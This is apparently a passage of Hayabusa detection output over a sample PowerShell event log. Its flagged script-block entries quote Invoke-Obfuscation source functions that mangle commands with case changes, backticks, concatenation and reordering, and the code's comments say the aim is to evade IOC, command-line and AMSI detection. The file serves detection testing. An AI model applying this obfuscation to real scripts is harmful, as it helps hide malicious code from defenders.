Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. 
For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' 
-ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. 
New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. 
$SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. 
$SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. 
$TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' 
-ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. 
If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. 
If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. 
$ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
